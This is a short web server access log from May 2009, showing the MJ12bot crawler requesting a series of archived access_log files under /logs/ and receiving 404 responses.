85.23.66.89 - - [30/May/2009:01:05:33 -0400] "GET /logs/access_log.Q109020900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:05:35 -0400] "GET /logs/access_log.Q109021200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:05:36 -0400] "GET /logs/access_log.Q109022200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:05:39 -0400] "GET /logs/access_log.Q109030900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:05:41 -0400] "GET /logs/access_log.Q109031300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:05:42 -0400] "GET /logs/access_log.Q109032500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:05:44 -0400] "GET /logs/access_log.Q109032600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
